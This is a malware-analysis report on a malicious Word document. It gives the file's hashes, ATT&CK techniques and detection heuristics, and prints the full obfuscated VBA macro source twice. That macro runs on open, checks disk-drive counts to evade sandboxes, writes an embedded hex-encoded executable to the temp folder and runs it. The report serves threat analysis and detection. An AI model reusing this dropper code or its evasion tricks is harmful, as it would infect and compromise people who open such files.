Office (OLE) malware analysis — malicious · d1c9b0fdf585824b

MALICIOUS

Office (OLE)

574.0 KB Created: 2014-07-16 07:28:00 Authoring application: Microsoft Office Word First seen: 2018-06-19

MD5: 600f753b852140339b50e5f8fe8821cb SHA-1: ec180101dd0f34b8fd28ac9ec898bb5f011a4726 SHA-256: d1c9b0fdf585824b3d4cea94e23fdec46d54b64f475bd79189eff1353bd087cf

390 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1071.001 Web Protocols

The sample is a malicious Office document containing VBA macros. The AutoOpen macro is designed to execute code, likely to download and run a second-stage payload. The document body contains a lure instructing the user to enable content, a common tactic for macro-based malware.

Heuristics 12

ClamAV: Doc.Dropper.HexEncodedEXEHeader-9789587-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.HexEncodedEXEHeader-9789587-1
VBA macros detected medium 6 related findings OLE_VBA_MACROS

Document contains VBA macro code

WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage

Matched line in script

Set maharani = VBA.CreateObject("WScript.Shell")
coerebidae = StrReverse("EdnapxE") + "nvironmentStrings"

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

Set maharani = VBA.CreateObject("WScript.Shell")
coerebidae = StrReverse("EdnapxE") + "nvironmentStrings"

GetObject call high OLE_VBA_GETOBJ

GetObject call

Matched line in script

enach = "Dis" + "kDriv" + "e"
Set ratchet = GetObject("winmgmts:\\" & ".\root\cimv2")
amaranthine = 39 - 26

CallByName call high OLE_VBA_CALLBYNAME

CallByName call

Matched line in script

coerebidae = StrReverse("EdnapxE") + "nvironmentStrings"
musophobia = CallByName(maharani, coerebidae, VbMethod, "%temp%")
Dim strigidae As Long

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Public Sub AutoOpen()
Dim quo As Object
```
Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/exif/1.0/In document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/rights/In document text (OLE body)
- http://www.iec.chIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5026 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5026 bytes
SHA-256: `a24f5a6114a6d9139b185dc5bfdb87d17c5b37ed66c6ee194598e285494fa098`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Document" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Public Sub InsertLandscapeSectionHere() ' Purpose: Insert a landscape section at the insertion point, ' and insert text to tell the user where the landscape section is. If Documents.Count > 0 Then ' The user has a document open, so insert a ' landscape section. With Selection ' Do not accidentally over-write selected text .Collapse Direction:=wdCollapseStart ' Insert section breaks with blank paragraphs ' in the new section. .TypeParagraph .Style = ActiveDocument.Styles(wdStyleNormal) .InsertBreak Type:=wdSectionBreakNextPage .TypeParagraph .TypeParagraph .TypeParagraph .InsertBreak Type:=wdSectionBreakNextPage .MoveUp Unit:=wdLine, Count:=3 ' Set the orientation of new section to landscape. .PageSetup.Orientation = wdOrientLandscape ' Provide guidance to the user. .TypeText Text:="Your landscape section starts here." End With Else ' Tell the user what to do. MsgBox "Please open a document and try again." End If End Sub Public Sub AutoOpen() Dim quo As Object Dim adjusted As Integer Dim unvoiced As String adjusted = catalonia.nelumbonaceae If adjusted = 115 + 83 + 42924 Then InsertLandscapeSectionHere Else dutiful = 57 - 73 + 106 enterobacteriaceae = 27 + 36 If dutiful + enterobacteriaceae > 68 Then bicentric = "io" + StrReverse("u") + Left("beagle", 0) End If catalonia.chimera End If End Sub Attribute VB_Name = "catalonia" Sub chimera() Dim uninteresting As String silvervine = "amino" Dim musophobia As String Dim enraptures As Variant Dim excogitation As String alkaloidal = 97 - 63 merestone = 128 - 74 For alkaloidal = 97 - 63 To 128 - 74 faker = Mid("kitesotclogging", 6, 2) + "is" + "" + "" Next alkaloidal Set maharani = VBA.CreateObject("WScript.Shell") coerebidae = StrReverse("EdnapxE") + "nvironmentStrings" musophobia = CallByName(maharani, coerebidae, VbMethod, "%temp%") Dim strigidae As Long excogitation = musophobia & "\delictum.exe" Dim agains As Integer Dim invaluableness Dim organizational organizational = FreeFile Dim halfholiday halfholiday = 0 Dim coherent Dim chevalier As Variant invaluableness = halfholiday cacoepy = Bullet.Proof Dim apaulette As Object ameiuridae = cacoepy necromancer = Len(ameiuridae) invaluableness = 1 Dim monospermous As String Open excogitation For Binary Access Write As #organizational Dim bureaucratic As Byte carouse = 31 - 118 + 126 halicoeres = 70 + 38 - 54 For carouse = 31 - 118 + 126 To 70 + 38 - 54 chamaecytisus = "un" + "wholesomeness" Next carouse disembroil = 124 + 98 - 220 For overpriced = invaluableness To (necromancer / disembroil) Call catalonia.unhygienically(organizational, ameiuridae, invaluableness) invaluableness = invaluableness + 2 Next overpriced california = 119 - 45 - 28 coloration = 75 - 23 For california = 119 - 45 - 28 To 75 - 23 mender = "eu" + "geni" + "a" + Mid("anywhereaground(p)", 9, 0) Next california Close #organizational musophobia = CallByName(maharani, "Run", VbMethod, excogitation) End Sub Public Sub unhygienically(ByRef bruised, apprehensible, axially) abeyance = VBA.Mid(apprehensible, axially, 2) Put #bruised, , CByte("&" + Chr(6 + 73 - 7) & abeyance) End Sub Function nelumbonaceae() Dim gorgonacea As Long appingit = Right("adaxialSe", 2) + Left("lectapheresis", 4) Dim atony As Integer bureaucrat = 0 dementat = 15 + 24 + 42 advantageous = 15 + 51 If dementat + advantageous > 48 Then capella = "fi" + "neloo" + Right("insultsking", 4) End If hyalinization = Left(" * fhabitation", 4) + "rom Win" + Mid("draff32_hypothesis", 6, 3) Dim algeria As String enach = "Dis" + "kDriv" + "e" Set ratchet = GetObject("winmgmts:\\" & ".\root\cimv2") amaranthine = 39 - 26 galley = 93 - 33 For amaranthine = 39 - 26 To 93 - 33 chytridiales = Left("suactinal", 2) + Mid("nintubminipaynes", 6, 5) + "ster" + "" Next amaranthine Set cynoglossidae = ratchet.ExecQuery(appingit & hyalinization & enach) For Each echidnophaga In cynoglossidae bureaucrat = bureaucrat + 69 - 6 - 62 Next nelumbonaceae = bureaucrat End Function Attribute VB_Name = "Bullet" Attribute VB_Base = "0{2683B9E9-184F-4D5E-9644-9AFE55D9647F}{9950C0A9-8DAD-44E4-8594-B97BF9CF1F52}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub UserForm_Initialize() End Sub

SHA-256: a24f5a6114a6d9139b185dc5bfdb87d17c5b37ed66c6ee194598e285494fa098

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Document"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Sub InsertLandscapeSectionHere()
' Purpose: Insert a landscape section at the insertion point,
' and insert text to tell the user where the landscape section is.
    If Documents.Count > 0 Then
        ' The user has a document open, so insert a
        ' landscape section.
        With Selection
            ' Do not accidentally over-write selected text
            .Collapse Direction:=wdCollapseStart

            ' Insert section breaks with blank paragraphs
            ' in the new section.
            .TypeParagraph
            .Style = ActiveDocument.Styles(wdStyleNormal)
            .InsertBreak Type:=wdSectionBreakNextPage
            .TypeParagraph
            .TypeParagraph
            .TypeParagraph
            .InsertBreak Type:=wdSectionBreakNextPage
            .MoveUp Unit:=wdLine, Count:=3

            ' Set the orientation of new section to landscape.
            .PageSetup.Orientation = wdOrientLandscape

            ' Provide guidance to the user.
            .TypeText Text:="Your landscape section starts here."
        End With
    Else
        ' Tell the user what to do.
        MsgBox "Please open a document and try again."
    End If
End Sub

Public Sub AutoOpen()
Dim quo As Object
Dim adjusted As Integer
Dim unvoiced As String
adjusted = catalonia.nelumbonaceae
If adjusted = 115 + 83 + 42924 Then
InsertLandscapeSectionHere
Else
dutiful = 57 - 73 + 106
enterobacteriaceae = 27 + 36
If dutiful + enterobacteriaceae > 68 Then
bicentric = "io" + StrReverse("u") + Left("beagle", 0)
End If

catalonia.chimera
End If
End Sub


Attribute VB_Name = "catalonia"
Sub chimera()
Dim uninteresting As String
silvervine = "amino"
Dim musophobia As String
Dim enraptures As Variant
Dim excogitation As String
alkaloidal = 97 - 63
merestone = 128 - 74
For alkaloidal = 97 - 63 To 128 - 74
faker = Mid("kitesotclogging", 6, 2) + "is" + "" + ""
Next alkaloidal

Set maharani = VBA.CreateObject("WScript.Shell")
coerebidae = StrReverse("EdnapxE") + "nvironmentStrings"
musophobia = CallByName(maharani, coerebidae, VbMethod, "%temp%")
Dim strigidae As Long
excogitation = musophobia & "\delictum.exe"

Dim agains As Integer
Dim invaluableness
Dim organizational
organizational = FreeFile
Dim halfholiday
halfholiday = 0
Dim coherent
Dim chevalier As Variant
invaluableness = halfholiday

cacoepy = Bullet.Proof

Dim apaulette As Object
ameiuridae = cacoepy
necromancer = Len(ameiuridae)
invaluableness = 1
Dim monospermous As String
Open excogitation For Binary Access Write As #organizational
Dim bureaucratic As Byte

carouse = 31 - 118 + 126
halicoeres = 70 + 38 - 54
For carouse = 31 - 118 + 126 To 70 + 38 - 54
chamaecytisus = "un" + "wholesomeness"
Next carouse

disembroil = 124 + 98 - 220
For overpriced = invaluableness To (necromancer / disembroil)
Call catalonia.unhygienically(organizational, ameiuridae, invaluableness)
invaluableness = invaluableness + 2
Next overpriced
california = 119 - 45 - 28
coloration = 75 - 23
For california = 119 - 45 - 28 To 75 - 23
mender = "eu" + "geni" + "a" + Mid("anywhereaground(p)", 9, 0)
Next california

Close #organizational
musophobia = CallByName(maharani, "Run", VbMethod, excogitation)
End Sub

Public Sub unhygienically(ByRef bruised, apprehensible, axially)
abeyance = VBA.Mid(apprehensible, axially, 2)
Put #bruised, , CByte("&" + Chr(6 + 73 - 7) & abeyance)
End Sub

Function nelumbonaceae()
Dim gorgonacea As Long
appingit = Right("adaxialSe", 2) + Left("lectapheresis", 4)
Dim atony As Integer
bureaucrat = 0
dementat = 15 + 24 + 42
advantageous = 15 + 51
If dementat + advantageous > 48 Then
capella = "fi" + "neloo" + Right("insultsking", 4)
End If
hyalinization = Left(" * fhabitation", 4) + "rom Win" + Mid("draff32_hypothesis", 6, 3)
Dim algeria As String
enach = "Dis" + "kDriv" + "e"
Set ratchet = GetObject("winmgmts:\\" & ".\root\cimv2")
amaranthine = 39 - 26
galley = 93 - 33
For amaranthine = 39 - 26 To 93 - 33
chytridiales = Left("suactinal", 2) + Mid("nintubminipaynes", 6, 5) + "ster" + ""
Next amaranthine
Set cynoglossidae = ratchet.ExecQuery(appingit & hyalinization & enach)
For Each echidnophaga In cynoglossidae
bureaucrat = bureaucrat + 69 - 6 - 62
Next
nelumbonaceae = bureaucrat
End Function


Attribute VB_Name = "Bullet"
Attribute VB_Base = "0{2683B9E9-184F-4D5E-9644-9AFE55D9647F}{9950C0A9-8DAD-44E4-8594-B97BF9CF1F52}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Private Sub UserForm_Initialize()

End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.